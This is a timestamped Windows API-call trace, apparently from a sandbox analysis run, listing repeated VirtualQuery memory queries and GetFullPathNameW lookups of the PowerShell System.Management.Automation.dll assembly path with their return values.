	[0351.388] VirtualQuery (in: lpAddress=0x1cb680, lpBuffer=0x1cc540, dwLength=0x30 | out: lpBuffer=0x1cc540*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.389] VirtualQuery (in: lpAddress=0x1cb5f0, lpBuffer=0x1cc4b0, dwLength=0x30 | out: lpBuffer=0x1cc4b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.390] VirtualQuery (in: lpAddress=0x1cb680, lpBuffer=0x1cc540, dwLength=0x30 | out: lpBuffer=0x1cc540*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.390] VirtualQuery (in: lpAddress=0x1cb5f0, lpBuffer=0x1cc4b0, dwLength=0x30 | out: lpBuffer=0x1cc4b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.390] VirtualQuery (in: lpAddress=0x1cb680, lpBuffer=0x1cc540, dwLength=0x30 | out: lpBuffer=0x1cc540*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.392] VirtualQuery (in: lpAddress=0x1cc090, lpBuffer=0x1ccf50, dwLength=0x30 | out: lpBuffer=0x1ccf50*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.629] VirtualQuery (in: lpAddress=0x1cc090, lpBuffer=0x1ccf50, dwLength=0x30 | out: lpBuffer=0x1ccf50*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.631] VirtualQuery (in: lpAddress=0x1cc090, lpBuffer=0x1ccf50, dwLength=0x30 | out: lpBuffer=0x1ccf50*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.631] VirtualQuery (in: lpAddress=0x1cc090, lpBuffer=0x1ccf50, dwLength=0x30 | out: lpBuffer=0x1ccf50*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
